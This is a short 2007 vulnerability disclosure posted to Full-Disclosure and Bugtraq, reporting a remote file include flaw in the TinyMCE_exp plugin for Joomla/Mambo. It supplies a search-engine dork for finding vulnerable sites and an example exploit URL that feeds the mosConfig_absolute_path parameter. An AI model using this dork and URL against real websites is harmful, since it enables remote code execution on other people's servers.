
Date: Sun, 11 Mar 2007 23:14:12 +0100
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@...il.com>
To: submit@...w0rm.com, bugtraq@...e-h.org, bugtraq@...urityfocus.com, 
	full-disclosure@...ts.grok.org.uk
Subject: TinyMCE_exp Remote File Include Vulnerability

###########################################################################
 TinyMCE_exp Remote File Include Vulnerability


 Author: Arturo Z.
 Contact: zeus@...sdelared.com
 Website: www.diosdelared.com
 Date: 10/03/07
 Risk: critical
 Vendor Url:
http://www.joomlaya.com/index.php?option=com_remository&func=fileinfo&filecatid=1868
 Affected Software: TinyMCE_exp
 search: allinurl: tiny_mce


example
##################################################################

http://site.com/path/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=

##################################################################

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
